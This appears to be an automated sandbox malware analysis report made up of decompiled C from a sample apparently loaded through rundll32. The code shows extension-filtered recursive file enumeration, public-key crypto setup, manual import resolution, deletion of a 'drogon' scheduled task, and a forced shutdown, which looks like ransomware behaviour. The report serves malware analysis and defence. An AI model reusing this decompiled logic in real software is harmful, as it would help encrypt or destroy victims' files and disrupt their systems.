                                                                                                                                                  • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04775636
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0477564C
                                                                                                                                                  • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04775662
                                                                                                                                                  • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04775682
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0477568D
                                                                                                                                                  • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 047756A6
                                                                                                                                                  • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 047756B5
                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 047756BF
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 047756C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3940947887-0
                                                                                                                                                  • Opcode ID: 7ea698bcdc96e6697631988e44393efdc09a55534fb871b2db38106f51d49bba
                                                                                                                                                  • Instruction ID: ec1acb6de15fa420f1e3cef9654386846fedd66134004bd46c88ec32738ebd8d
                                                                                                                                                  • Opcode Fuzzy Hash: 7ea698bcdc96e6697631988e44393efdc09a55534fb871b2db38106f51d49bba
                                                                                                                                                  • Instruction Fuzzy Hash: CB213075501218BFDF219F929C85EEFBF7DEF09B90F408011FA08A6194D671AA11DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E04775E9F(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                  				short _v524;
                                                                                                                                                  				short _v532;
                                                                                                                                                  				short _v1052;
                                                                                                                                                  				short _v1060;
                                                                                                                                                  				struct _WIN32_FIND_DATAW _v1644;
                                                                                                                                                  				void* _v1648;
                                                                                                                                                  				signed int _v1652;
                                                                                                                                                  				int _t44;
                                                                                                                                                  				long _t52;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  				int _t55;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				WCHAR* _t61;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				WCHAR** _t69;
                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                                  				intOrPtr _t79;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				intOrPtr _t83;
                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                  				signed int _t90;
                                                                                                                                                  				signed int _t91;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  				WCHAR* _t114;
                                                                                                                                                  
                                                                                                                                                  				_t93 = (_t91 & 0xfffffff8) - 0x668;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					L39:
                                                                                                                                                  					return _t44;
                                                                                                                                                  				}
                                                                                                                                                  				_t44 = PathCombineW( &_v524, _a4, "*");
                                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                                  					goto L39;
                                                                                                                                                  				}
                                                                                                                                                  				_t44 = FindFirstFileW( &_v532,  &_v1644); // executed
                                                                                                                                                  				_v1648 = _t44;
                                                                                                                                                  				if(_t44 == 0xffffffff) {
                                                                                                                                                  					goto L39;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				}
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L3:
                                                                                                                                                  					_t52 = WaitForMultipleObjects((0 |  *((intOrPtr*)(_a12 + 0x4c)) != 0x00000000) + 1, _a12 + 0x48, 0, 0);
                                                                                                                                                  					if(_t52 == 0 || _t52 == 1 || _t52 == 0xffffffff) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t73 = ".";
                                                                                                                                                  					_t53 =  &(_v1644.cFileName);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t79 =  *_t53;
                                                                                                                                                  						if(_t79 !=  *_t73) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t79 == 0) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t53 = 0;
                                                                                                                                                  							L13:
                                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                                  								L37:
                                                                                                                                                  								_t55 = FindNextFileW(_v1648,  &_v1644); // executed
                                                                                                                                                  								if(_t55 != 0) {
                                                                                                                                                  									goto L3;
                                                                                                                                                  								}
                                                                                                                                                  								goto L38;
                                                                                                                                                  							}
                                                                                                                                                  							_t74 = L"..";
                                                                                                                                                  							_t56 =  &(_v1644.cFileName);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t80 =  *_t56;
                                                                                                                                                  								if(_t80 !=  *_t74) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								if(_t80 == 0) {
                                                                                                                                                  									L19:
                                                                                                                                                  									_t56 = 0;
                                                                                                                                                  									L21:
                                                                                                                                                  									if(_t56 != 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0) {
                                                                                                                                                  										if((_v1652 & 0x00000010) == 0 || (_v1652 & 0x00000400) != 0) {
                                                                                                                                                  											_t61 = PathFindExtensionW( &(_v1644.dwReserved0));
                                                                                                                                                  											_t75 =  &(_v1644.dwReserved0);
                                                                                                                                                  											_t81 = _t75 + 2;
                                                                                                                                                  											do {
                                                                                                                                                  												_t89 =  *_t75;
                                                                                                                                                  												_t75 = _t75 + 2;
                                                                                                                                                  											} while (_t89 != 0);
                                                                                                                                                  											if(_t61 == _t93 + 0x3c + (_t75 - _t81 >> 1) * 2) {
                                                                                                                                                  												_t62 = 0;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t62 = E047759B1(_t61); // executed
                                                                                                                                                  											}
                                                                                                                                                  											if(_t62 != 0) {
                                                                                                                                                  												E04775D0A(_t81,  &_v1060, _a12); // executed
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t90 = 0;
                                                                                                                                                  											_t114 =  *0x4783014; // 0x4781528
                                                                                                                                                  											if(_t114 == 0) {
                                                                                                                                                  												L29:
                                                                                                                                                  												E04775E9F( &_v1060, _a8 - 1, _a12); // executed
                                                                                                                                                  												goto L37;
                                                                                                                                                  											}
                                                                                                                                                  											_t69 = 0x4783014;
                                                                                                                                                  											while(StrStrIW( &_v1060,  *_t69) == 0) {
                                                                                                                                                  												_t90 = _t90 + 1;
                                                                                                                                                  												_t69 =  &(0x4783014[_t90]);
                                                                                                                                                  												if( *_t69 != 0) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												goto L29;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L37;
                                                                                                                                                  								}
                                                                                                                                                  								_t82 =  *((intOrPtr*)(_t56 + 2));
                                                                                                                                                  								_t17 = _t74 + 2; // 0x2e
                                                                                                                                                  								if(_t82 !=  *_t17) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t56 = _t56 + 4;
                                                                                                                                                  								_t74 = _t74 + 4;
                                                                                                                                                  								if(_t82 != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                  							asm("sbb eax, 0xffffffff");
                                                                                                                                                  							goto L21;
                                                                                                                                                  						}
                                                                                                                                                  						_t83 =  *((intOrPtr*)(_t53 + 2));
                                                                                                                                                  						_t14 = _t73 + 2; // 0x650000
                                                                                                                                                  						if(_t83 !=  *_t14) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t53 = _t53 + 4;
                                                                                                                                                  						_t73 = _t73 + 4;
                                                                                                                                                  						if(_t83 != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						goto L11;
                                                                                                                                                  					}
                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				L38:
                                                                                                                                                  				_t44 = FindClose(_v1648); // executed
                                                                                                                                                  				goto L39;
                                                                                                                                                  			}































                                                                                                                                                  0x04775ea5
                                                                                                                                                  0x04775eb2
                                                                                                                                                  0x0477607d
                                                                                                                                                  0x04776082
                                                                                                                                                  0x04776082
                                                                                                                                                  0x04775ec8
                                                                                                                                                  0x04775ed0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775ee3
                                                                                                                                                  0x04775ee9
                                                                                                                                                  0x04775ef0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775ef6
                                                                                                                                                  0x04775ef6
                                                                                                                                                  0x04775f09
                                                                                                                                                  0x04775f11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f29
                                                                                                                                                  0x04775f2e
                                                                                                                                                  0x04775f32
                                                                                                                                                  0x04775f32
                                                                                                                                                  0x04775f38
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f3d
                                                                                                                                                  0x04775f54
                                                                                                                                                  0x04775f54
                                                                                                                                                  0x04775f5d
                                                                                                                                                  0x04775f5f
                                                                                                                                                  0x0477605c
                                                                                                                                                  0x04776065
                                                                                                                                                  0x0477606d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477606d
                                                                                                                                                  0x04775f65
                                                                                                                                                  0x04775f6a
                                                                                                                                                  0x04775f6e
                                                                                                                                                  0x04775f6e
                                                                                                                                                  0x04775f74
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f79
                                                                                                                                                  0x04775f90
                                                                                                                                                  0x04775f90
                                                                                                                                                  0x04775f99
                                                                                                                                                  0x04775f9b
                                                                                                                                                  0x04775fc4
                                                                                                                                                  0x0477601b
                                                                                                                                                  0x04776021
                                                                                                                                                  0x04776025
                                                                                                                                                  0x04776028
                                                                                                                                                  0x04776028
                                                                                                                                                  0x0477602b
                                                                                                                                                  0x0477602e
                                                                                                                                                  0x0477603d
                                                                                                                                                  0x04776046
                                                                                                                                                  0x0477603f
                                                                                                                                                  0x0477603f
                                                                                                                                                  0x0477603f
                                                                                                                                                  0x0477604a
                                                                                                                                                  0x04776057
                                                                                                                                                  0x04776057
                                                                                                                                                  0x04775fd0
                                                                                                                                                  0x04775fd0
                                                                                                                                                  0x04775fd2
                                                                                                                                                  0x04775fd8
                                                                                                                                                  0x04775fff
                                                                                                                                                  0x0477600f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477600f
                                                                                                                                                  0x04775fda
                                                                                                                                                  0x04775fdf
                                                                                                                                                  0x04775ff3
                                                                                                                                                  0x04775ff4
                                                                                                                                                  0x04775ffd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775ffd
                                                                                                                                                  0x04775fdf
                                                                                                                                                  0x04775fc4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f9b
                                                                                                                                                  0x04775f7b
                                                                                                                                                  0x04775f7f
                                                                                                                                                  0x04775f83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f85
                                                                                                                                                  0x04775f88
                                                                                                                                                  0x04775f8e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f8e
                                                                                                                                                  0x04775f94
                                                                                                                                                  0x04775f96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f96
                                                                                                                                                  0x04775f3f
                                                                                                                                                  0x04775f43
                                                                                                                                                  0x04775f47
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f49
                                                                                                                                                  0x04775f4c
                                                                                                                                                  0x04775f52
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f52
                                                                                                                                                  0x04775f58
                                                                                                                                                  0x04775f5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04775f5a
                                                                                                                                                  0x04776073
                                                                                                                                                  0x04776077
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • PathCombineW.SHLWAPI(?,?,04781554,?,?), ref: 04775EC8
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 04775EE3
                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04775F09
                                                                                                                                                  • PathCombineW.SHLWAPI(?,?,?), ref: 04775FB1
                                                                                                                                                  • StrStrIW.SHLWAPI(?,04783014), ref: 04775FE9
                                                                                                                                                  • PathFindExtensionW.SHLWAPI(?), ref: 0477601B
                                                                                                                                                  • FindNextFileW.KERNELBASE(?,?), ref: 04776065
                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 04776077
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1251538951-0
                                                                                                                                                  • Opcode ID: 0e3b2e197928b5181283dd59324f01f1452e3843f997bcf834e60a1286d5f9ad
                                                                                                                                                  • Instruction ID: 293ae6117ee1402f33aadc2298f3ced9b990770b7e5de928d92fc54a7bf02a9a
                                                                                                                                                  • Opcode Fuzzy Hash: 0e3b2e197928b5181283dd59324f01f1452e3843f997bcf834e60a1286d5f9ad
                                                                                                                                                  • Instruction Fuzzy Hash: 9C51CE71104605ABEF31EF24C848DBAB3AAEF84724FD44E2AE552C6298F732E545CB51
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E04778A23() {
                                                                                                                                                  				void* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t4 = E0477808E(); // executed
                                                                                                                                                  				if(( *0x4787bc0 & 0x00000002) != 0) {
                                                                                                                                                  					_t4 = E04777FB7(L"schtasks /Delete /F /TN drogon", 0); // executed
                                                                                                                                                  				}
                                                                                                                                                  				if(( *0x4787bc0 & 0x00000001) != 0) {
                                                                                                                                                  					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000); // executed
                                                                                                                                                  					if(_t4 == 0) {
                                                                                                                                                  						ExitWindowsEx(6, 0); // executed
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				ExitProcess(0);
                                                                                                                                                  			}




                                                                                                                                                  0x04778a24
                                                                                                                                                  0x04778a32
                                                                                                                                                  0x04778a3a
                                                                                                                                                  0x04778a3a
                                                                                                                                                  0x04778a46
                                                                                                                                                  0x04778a54
                                                                                                                                                  0x04778a5c
                                                                                                                                                  0x04778a61
                                                                                                                                                  0x04778a61
                                                                                                                                                  0x04778a5c
                                                                                                                                                  0x04778a68

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0477808E: wsprintfW.USER32 ref: 047780BC
                                                                                                                                                    • Part of subcall function 0477808E: wsprintfW.USER32 ref: 047780CC
                                                                                                                                                    • Part of subcall function 0477808E: wsprintfW.USER32 ref: 047780DC
                                                                                                                                                    • Part of subcall function 0477808E: wsprintfW.USER32 ref: 047780EC
                                                                                                                                                    • Part of subcall function 0477808E: wsprintfW.USER32 ref: 04778126
                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04778A54
                                                                                                                                                  • ExitWindowsEx.USER32 ref: 04778A61
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04778A68
                                                                                                                                                    • Part of subcall function 04777FB7: wsprintfW.USER32 ref: 04777FD6
                                                                                                                                                    • Part of subcall function 04777FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04777FFA
                                                                                                                                                    • Part of subcall function 04777FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0477800C
                                                                                                                                                    • Part of subcall function 04777FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04778022
                                                                                                                                                    • Part of subcall function 04777FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04778069
                                                                                                                                                    • Part of subcall function 04777FB7: Sleep.KERNELBASE(00000000), ref: 0477807F
                                                                                                                                                  Strings
                                                                                                                                                  • schtasks /Delete /F /TN drogon, xrefs: 04778A35
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                                                                                                  • String ID: schtasks /Delete /F /TN drogon
                                                                                                                                                  • API String ID: 3579268615-951750757
                                                                                                                                                  • Opcode ID: 02a859dfb955ce2d197131e4b4b2789cd4808cbb5b57da9e418613273083f3d7
                                                                                                                                                  • Instruction ID: 26738ae3be594129a8eed10faff6bf947a32f475974a2b0555b2be0e39819682
                                                                                                                                                  • Opcode Fuzzy Hash: 02a859dfb955ce2d197131e4b4b2789cd4808cbb5b57da9e418613273083f3d7
                                                                                                                                                  • Instruction Fuzzy Hash: 0AE0863029222075FB357731AD0DFDB3E49EF437A8F968104FA4560180CBDD6942C1B6
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E04779016() {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				long _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				int _t53;
                                                                                                                                                  				int _t57;
                                                                                                                                                  				struct HINSTANCE__* _t60;
                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                  				signed int _t62;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				long _t66;
                                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				signed int _t73;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				signed int _t77;
                                                                                                                                                  				signed int* _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				signed int* _t85;
                                                                                                                                                  
                                                                                                                                                  				_t71 =  *0x4787b98;
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t48 =  *((intOrPtr*)(_t71 + 0x3c)) + _t71;
                                                                                                                                                  				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
                                                                                                                                                  				if(_t70 != 0) {
                                                                                                                                                  					_v12 = _v12 & 0x00000000;
                                                                                                                                                  					_t77 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                  					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                  					_v16 = _t82;
                                                                                                                                                  					if(_t77 > 0) {
                                                                                                                                                  						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
                                                                                                                                                  						_v20 = _t66;
                                                                                                                                                  						do {
                                                                                                                                                  							_t75 =  *((intOrPtr*)(_t82 + 0xc));
                                                                                                                                                  							if(_t66 < _t75) {
                                                                                                                                                  								goto L5;
                                                                                                                                                  							} else {
                                                                                                                                                  								_v24 =  *(_t82 + 8) + _t75;
                                                                                                                                                  								_t66 = _v20;
                                                                                                                                                  								if(_t66 >= _v24) {
                                                                                                                                                  									goto L5;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L6;
                                                                                                                                                  							L5:
                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                  							_t82 = _t82 + 0x28;
                                                                                                                                                  							_v16 = _t82;
                                                                                                                                                  						} while (_v12 < _t77);
                                                                                                                                                  					}
                                                                                                                                                  					L6:
                                                                                                                                                  					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
                                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                                  						_v8 = 1;
                                                                                                                                                  						if( *_t70 == 0) {
                                                                                                                                                  							L22:
                                                                                                                                                  							_t57 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x4787b98,  *(_t82 + 8), _v20,  &_v20); // executed
                                                                                                                                                  							_v8 = _t57;
                                                                                                                                                  						} else {
                                                                                                                                                  							while(_v8 == 1) {
                                                                                                                                                  								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x4787b98); // executed
                                                                                                                                                  								_v12 = _t60;
                                                                                                                                                  								if(_t60 == 0) {
                                                                                                                                                  									_v8 = _v8 & 0x00000000;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t61 =  *0x4787b98;
                                                                                                                                                  									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
                                                                                                                                                  									_t80 =  *_t70 + _t61;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t62 =  *_t80;
                                                                                                                                                  										if(_t62 == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										if(_v8 == 1) {
                                                                                                                                                  											_t73 = _t62 & 0x7fffffff;
                                                                                                                                                  											if(_t73 != _t62) {
                                                                                                                                                  												_push(_t73);
                                                                                                                                                  											} else {
                                                                                                                                                  												_push( *0x4787b98 + _t73 + 2);
                                                                                                                                                  											}
                                                                                                                                                  											_t63 = GetProcAddress(_v12, ??); // executed
                                                                                                                                                  											 *_t85 = _t63;
                                                                                                                                                  											if(_t63 == 0) {
                                                                                                                                                  												_v8 = _v8 & _t63;
                                                                                                                                                  											}
                                                                                                                                                  											_t85 =  &(_t85[1]);
                                                                                                                                                  											_t80 =  &(_t80[1]);
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t82 = _v16;
                                                                                                                                                  								}
                                                                                                                                                  								_t70 = _t70 + 0x14;
                                                                                                                                                  								if( *_t70 != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                  								goto L22;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}
























                                                                                                                                                  0x0477901c
                                                                                                                                                  0x04779025
                                                                                                                                                  0x04779029
                                                                                                                                                  0x04779032
                                                                                                                                                  0x04779034
                                                                                                                                                  0x0477903e
                                                                                                                                                  0x04779044
                                                                                                                                                  0x04779048
                                                                                                                                                  0x0477904c
                                                                                                                                                  0x04779051
                                                                                                                                                  0x04779053
                                                                                                                                                  0x04779059
                                                                                                                                                  0x0477905c
                                                                                                                                                  0x0477905c
                                                                                                                                                  0x04779061
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779063
                                                                                                                                                  0x04779068
                                                                                                                                                  0x0477906b
                                                                                                                                                  0x04779071
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779071
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779073
                                                                                                                                                  0x04779073
                                                                                                                                                  0x04779076
                                                                                                                                                  0x04779079
                                                                                                                                                  0x0477907c
                                                                                                                                                  0x0477905c
                                                                                                                                                  0x04779081
                                                                                                                                                  0x04779090
                                                                                                                                                  0x04779098
                                                                                                                                                  0x047790a1
                                                                                                                                                  0x047790a8
                                                                                                                                                  0x04779129
                                                                                                                                                  0x0477913d
                                                                                                                                                  0x04779143
                                                                                                                                                  0x047790aa
                                                                                                                                                  0x047790aa
                                                                                                                                                  0x047790ba
                                                                                                                                                  0x047790c0
                                                                                                                                                  0x047790c5
                                                                                                                                                  0x0477914e
                                                                                                                                                  0x047790cb
                                                                                                                                                  0x047790cb
                                                                                                                                                  0x047790d5
                                                                                                                                                  0x047790d7
                                                                                                                                                  0x04779112
                                                                                                                                                  0x04779112
                                                                                                                                                  0x04779116
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047790df
                                                                                                                                                  0x047790e3
                                                                                                                                                  0x047790eb
                                                                                                                                                  0x047790f9
                                                                                                                                                  0x047790ed
                                                                                                                                                  0x047790f6
                                                                                                                                                  0x047790f6
                                                                                                                                                  0x047790fd
                                                                                                                                                  0x04779103
                                                                                                                                                  0x04779107
                                                                                                                                                  0x04779109
                                                                                                                                                  0x04779109
                                                                                                                                                  0x0477910c
                                                                                                                                                  0x0477910f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477910f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047790df
                                                                                                                                                  0x04779118
                                                                                                                                                  0x04779118
                                                                                                                                                  0x0477911b
                                                                                                                                                  0x04779121
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779121
                                                                                                                                                  0x04779127
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779127
                                                                                                                                                  0x047790a8
                                                                                                                                                  0x04779147
                                                                                                                                                  0x0477914d

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04779090
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 047790BA
                                                                                                                                                  • GetProcAddress.KERNELBASE(00000000,?), ref: 047790FD
                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0477913D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                  • Opcode ID: 2bd214999e22e9096820ad34486cfebc0ee9d33974497997056232bf72a05a40
                                                                                                                                                  • Instruction ID: a3e04e2ecd8673d323dee590caa74b0fa043a6ac5c240ea0de589da202dd03ab
